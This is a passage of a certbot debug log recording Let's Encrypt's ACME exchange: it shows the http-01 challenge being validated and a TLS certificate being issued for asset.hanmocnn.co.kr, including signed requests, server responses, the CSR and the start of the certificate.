"signature": "AB8QdQhOPhFKnAgDOMQR-4cKyHUTqsh8px5OEL8IPwcA1TUlP_ok0X7p1t6Y8akwLyCZl-hYngxHDbdJuSk3bEx2d3HzzCHIy7IoMEUXDa8Q0N1SAO1MNp0xdcGLFS8VwJwj29of318S7J1K0U3JvwFmY7sSzjqEm9TBTydWpu1BPNr64DLLPuyFIVks3Z14GYzVSzIMHtkNU19FcD25hFr8IkUfAgFdxKnoYwF0g6tdX9VzMUaMFOkQo4FPVb0q5ofDdsojIAaETvynTPGUx3Gi2RnS-WPRZW2dODiWTbMcNhoTo_qvGFTup29GyGf26mmTLID0xPohUABm9qx-8A",
|
||||||
|
"payload": "e30"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:03,679:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658770786636/bWY-tg HTTP/1.1" 200 195
|
||||||
|
2026-02-14 22:59:03,680:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:03 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 195
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636>;rel="up"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg
|
||||||
|
Replay-Nonce: NeKnt8TGRpLEM98vPidFNGYZLhniMzbW0ZgaRAcNcHMdxsudar4
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:03,680:DEBUG:acme.client:Storing nonce: NeKnt8TGRpLEM98vPidFNGYZLhniMzbW0ZgaRAcNcHMdxsudar4
|
||||||
|
2026-02-14 22:59:03,681:INFO:certbot._internal.auth_handler:Waiting for verification...
|
||||||
|
2026-02-14 22:59:04,681:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:04,686:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1JwTEVNOTh2UGlkRk5HWVpMaG5pTXpiVzBaZ2FSQWNOY0hNZHhzdWRhcjQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
|
||||||
|
"signature": "lqMsMOa-tUArJGS6N0hsMij68VjUFY48A2N6C_ro3al7tuGMf1XEiIEmRFGlK3X0X8IsrQPx4ej6Q22199sngBR1VJpP2X5mL8MYNQ2DipAlvMnWuNs8LUqsNRo05eKZoP1TbVp39qG6LklndIiCbuyxCcHJ3DKFpQzbOURUqAX_rbJfEkNQ3NHBgkkMFieByCnag80G9H2PfhHp26mYg4l0NTqRPc1Eii7yg70oMwer-gAzrsi4xwHACrD-LwQD3Eok7CLzaXlyu81UGVXFMVLYKEgbisAK_UtUVJlxfKjV6gvFpNpL_4VskR4LLoUFJ_X9LBnsqH5r-kz21Wlxkg",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:04,850:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828
|
||||||
|
2026-02-14 22:59:04,851:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:04 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 828
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGHW4lMhMmVdh1Jz0VwzPkUfV13XBXPHC3SxBVS6LSJd0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:59:03Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:04,851:DEBUG:acme.client:Storing nonce: NeKnt8TGHW4lMhMmVdh1Jz0VwzPkUfV13XBXPHC3SxBVS6LSJd0
|
||||||
|
2026-02-14 22:59:04,851:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'}
|
||||||
|
2026-02-14 22:59:07,852:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:07,857:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0hXNGxNaE1tVmRoMUp6MFZ3elBrVWZWMTNYQlhQSEMzU3hCVlM2TFNKZDAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
|
||||||
|
"signature": "QCjdqTcoky09Iivejj8OrcpoMGEMjAELmU5tH_5Fapt_tiHcaVIR5Vc3NBiO7vfeebmwEIIzADkvwHoqG7Epms-H4nQShQDPZdXdCxiry3x1DEVa2-3U-aPAiNN28I7WKMQNgipHA0EzT5b9QZzgs5g-Y-bz7kAOrggvBD9e9jejCbP0H0XHMbjqayajRwqppuetN2q7pyN2mTah6ytKL2x1k7NMhJZ124DQeZcAVn9AQlCU-_fbr9vgvzW9d5YqnBTTkQUGsiSC1M1HZ4oYm8yYTuuje-fIIvtWRxUeXvsUrPIsMhFOH-7foMWyNr0upwf1r7Ifo1K9NVtpJb6svg",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:08,018:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828
|
||||||
|
2026-02-14 22:59:08,019:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:07 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 828
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TG7x2394sOWVy6kZh5Ix7io-g9_X7c9_aBMoyHXO7TPBg
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:59:03Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:08,019:DEBUG:acme.client:Storing nonce: NeKnt8TG7x2394sOWVy6kZh5Ix7io-g9_X7c9_aBMoyHXO7TPBg
|
||||||
|
2026-02-14 22:59:08,019:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'}
|
||||||
|
2026-02-14 22:59:11,020:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:11,025:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhURzd4MjM5NHNPV1Z5NmtaaDVJeDdpby1nOV9YN2M5X2FCTW95SFhPN1RQQmciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
|
||||||
|
"signature": "Ldxrn7k1DP_uQlFHFvMQhUxVgFGNXgyB5QwZ6J6zt-QILlDAJemOF6XxvpEoan56zOoTQFAF-E4a4Fb_T69BZGzHLwqbLd7pvsu6BpfIZ9BKqy3CiOPyd6P3aeYUNz2G9oblHxaUTj76yhRZ4LreMMUoZBIOX9TsAzA-AjqT2f4FtnPTCNvFfd4HjvjSFAz1MBcnCBeL4I2YXooKtGAUMD-tawfZbZMw2nXavM1dQS16jLrWVGEU3fAB2oAlsW8fz5oZCgQf-nhYmzfillCzb1n3G7D_FstbVcOSAdcMn2KxfndxwXf_HzLKaVxXe_WbCn4ojRQfCB_ecNdRk4XWbw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:11,189:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 783
|
||||||
|
2026-02-14 22:59:11,190:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 783
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGRU1HvCLUtMedL_PWvsFY5XO4Pk_SF1R_Oj27V3w8DBY
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-16T22:59:09Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-14T22:59:03Z",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://asset.hanmocnn.co.kr/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs",
|
||||||
|
"hostname": "asset.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:11,190:DEBUG:acme.client:Storing nonce: NeKnt8TGRU1HvCLUtMedL_PWvsFY5XO4Pk_SF1R_Oj27V3w8DBY
|
||||||
|
2026-02-14 22:59:11,191:DEBUG:certbot._internal.error_handler:Calling registered functions
|
||||||
|
2026-02-14 22:59:11,191:INFO:certbot._internal.auth_handler:Cleaning up challenges
|
||||||
|
2026-02-14 22:59:11,191:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs
|
||||||
|
2026-02-14 22:59:11,191:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
|
||||||
|
2026-02-14 22:59:11,192:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50LGZLNqLZ\nI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89oqy/XC6K\nS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/CioDIwMAYJKoZIhvcN\nAQkOMSMwITAfBgNVHREEGDAWghRhc3NldC5oYW5tb2Nubi5jby5rcjAKBggqhkjO\nPQQDAgNnADBkAjBHU9b6je1e67iRpIKL75f+XH4fD4znqweIKxf4wcy7cuSnwIen\n35GhFB+6DqQXeRgCMEc5DM/pAiGgSrRTP1U2QZ8qDZgOJl+GRANbmOGaBo22tBrf\nLPi9rBm2X2PP6tQNKw==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
|
||||||
|
2026-02-14 22:59:11,192:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 23:00:41.192628
|
||||||
|
2026-02-14 22:59:11,193:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "csr": "MIIBKTCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50LGZLNqLZI-HF8yTMleRX-LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774_89oqy_XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO_CioDIwMAYJKoZIhvcNAQkOMSMwITAfBgNVHREEGDAWghRhc3NldC5oYW5tb2Nubi5jby5rcjAKBggqhkjOPQQDAgNnADBkAjBHU9b6je1e67iRpIKL75f-XH4fD4znqweIKxf4wcy7cuSnwIen35GhFB-6DqQXeRgCMEc5DM_pAiGgSrRTP1U2QZ8qDZgOJl-GRANbmOGaBo22tBrfLPi9rBm2X2PP6tQNKw"\n}'
|
||||||
|
2026-02-14 22:59:11,197:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1JVMUh2Q0xVdE1lZExfUFd2c0ZZNVhPNFBrX1NGMVJfT2oyN1YzdzhEQlkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzYwNzAxNjA2In0",
|
||||||
|
"signature": "XnpECPUS8omlpPj4uWeSuoaPg43d5qm1xHW-myYldQmE-Fj_xEfiBLY66cGWDy83FPo5UEkMjKAemg38qC8u0UbGz8aMZPtAJbvYfdv9kCr6v-vJZp345dl4M0_bSmZEAZRRO08UYab3Af1lfDUlp6LB2AbkXBWZ0cp1crluoNOGY5MFLQILwS2hdCkIV0vFbUPyzyZF7xC9rJ3F2hl07OoyqoBcHHwwifsynUeYm0V9XrYhJ0T8bQErHvGNQMTmfrQC32eT-hmK1tSJ4Vp5yza_Ac0xoK3hv0GftuXJzkXEc5qXzREW29k18PFpM8fn6rrgyM7jHR8kKnCFVJViRA",
|
||||||
|
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0JzUUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFWFp1V3d3NTBMR1pMTnFMWkktSEY4eVRNbGVSWC1McG1vR0xVTkZHeGdZU0F6VmdMcWt3emRZdENaV2daVWVYM1J6Nzc0Xzg5b3F5X1hDNktTMTJIUjNaQndZSEd1aFdXYkpQNGJaYnY2N0FKWmQ1VUhka2NjTmE5d3lCRU9fQ2lvREl3TUFZSktvWklodmNOQVFrT01TTXdJVEFmQmdOVkhSRUVHREFXZ2hSaGMzTmxkQzVvWVc1dGIyTnViaTVqYnk1cmNqQUtCZ2dxaGtqT1BRUURBZ05uQURCa0FqQkhVOWI2amUxZTY3aVJwSUtMNzVmLVhINGZENHpucXdlSUt4ZjR3Y3k3Y3VTbndJZW4zNUdoRkItNkRxUVhlUmdDTUVjNURNX3BBaUdnU3JSVFAxVTJRWjhxRFpnT0psLUdSQU5ibU9HYUJvMjJ0QnJmTFBpOXJCbTJYMlBQNnRRTkt3Igp9"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:13,485:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480360701606 HTTP/1.1" 200 456
|
||||||
|
2026-02-14 22:59:13,486:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:13 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 456
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606
|
||||||
|
Replay-Nonce: NeKnt8TGkiAFymgyXx91sjo-OBrE-oQfkAIA5BkETAcVbXDQlto
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-21T22:59:03Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:13,486:DEBUG:acme.client:Storing nonce: NeKnt8TGkiAFymgyXx91sjo-OBrE-oQfkAIA5BkETAcVbXDQlto
|
||||||
|
2026-02-14 22:59:14,487:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:14,492:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2tpQUZ5bWd5WHg5MXNqby1PQnJFLW9RZmtBSUE1QmtFVEFjVmJYRFFsdG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzYwNzAxNjA2In0",
|
||||||
|
"signature": "Z-7PwibQOXUSAB_CO21hOY9cgXtdwG1rm6XbsU4bvAqs1jZQZie589vOdI2zqaHJdzvFygp4EGdSgVP-BTTHKah86AXQi2cEpkFDkXE-PwfqdVWepDBJSbmRV153pH5jNVImDtZfa_khZder6EIjXsliW_jOFfMko6gGMvTz6lfWZMHvJ6tvDvg0f8QoQgsGwkBGQOFtp54nCoV9axiaDyaKqBHJul_7guWVSQRc8kvH18e3mBon4gIoENyM79F4tyL25XkSVPkfFyFgOtvVzMK5fnsm-3InU9K4t6-LLzRf-bUakcdTeK4aN1VAJGVmUo0ov0EYRe0RYHitfjQa9w",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:14,654:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480360701606 HTTP/1.1" 200 456
|
||||||
|
2026-02-14 22:59:14,655:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:14 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 456
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606
|
||||||
|
Replay-Nonce: 4AH-2vvBlPhWxA_xH3pX1GKMJ1JDGhdBwPdEwi365OWaCQ0tLxc
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-21T22:59:03Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:14,655:DEBUG:acme.client:Storing nonce: 4AH-2vvBlPhWxA_xH3pX1GKMJ1JDGhdBwPdEwi365OWaCQ0tLxc
|
||||||
|
2026-02-14 22:59:14,655:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:14,659:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QmxQaFd4QV94SDNwWDFHS01KMUpER2hkQndQZEV3aTM2NU9XYUNRMHRMeGMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUxOWRkNzNlMGNlOWE4NzQ5MGViYjdlNzVhNzg5ZGY1ZGY1In0",
|
||||||
|
"signature": "aNwI7RwCcv76J8ktGfy0gChQ1ua2ZM9ov4ueZs4nFi9cOfah2fT650Dp4kh6gOcUMHfts5-LMvj4EwFqD5QAjpI2A9ge_KIC0Tifji0eRRuBF9YzcI7k3UodzNmOCMsO3w-ylFA3SWDDwOoUaLnyLY3FXVxhCjMlvKJohHZVMkTHivtzZxkfC_Z46zlzh5PVqP5qO2bkANnKsnrlYtXx6MVn0_Wv3NwU2cQC8b_lmdD5lDpTKjQHHx-HzCAFoPECSW2DFKBLUKKA4OSOjvepqAct2LI0YY-6vBZxtvAZlroXLPtENtMIP0pYlv_b0pGwrzVsyQSEGZRtgFxEahwlTA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:14,820:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5 HTTP/1.1" 200 2909
|
||||||
|
2026-02-14 22:59:14,821:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:14 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2909
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1>;rel="alternate"
|
||||||
|
Replay-Nonce: 4AH-2vvBHXlFw_TACqGZ1oTRV-SKrkz7zJl6XVjonKPAOUQ_71o
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDsTCCAzegAwIBAgISBRndc+DOmodJDrt+daeJ3131MAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
NzAeFw0yNjAyMTQyMjAwNDFaFw0yNjA1MTUyMjAwNDBaMB8xHTAbBgNVBAMTFGFz
|
||||||
|
c2V0Lmhhbm1vY25uLmNvLmtyMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50
|
||||||
|
LGZLNqLZI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89
|
||||||
|
oqy/XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/Cio4ICITCC
|
||||||
|
Ah0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB
|
||||||
|
/wQCMAAwHQYDVR0OBBYEFBaS++xJtf3XGPCAgqNyrG/f6BjWMB8GA1UdIwQYMBaA
|
||||||
|
FK5IntyHHUSgb9qi5WB0BHjCnACAMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcw
|
||||||
|
AoYWaHR0cDovL2U3LmkubGVuY3Iub3JnLzAfBgNVHREEGDAWghRhc3NldC5oYW5t
|
||||||
|
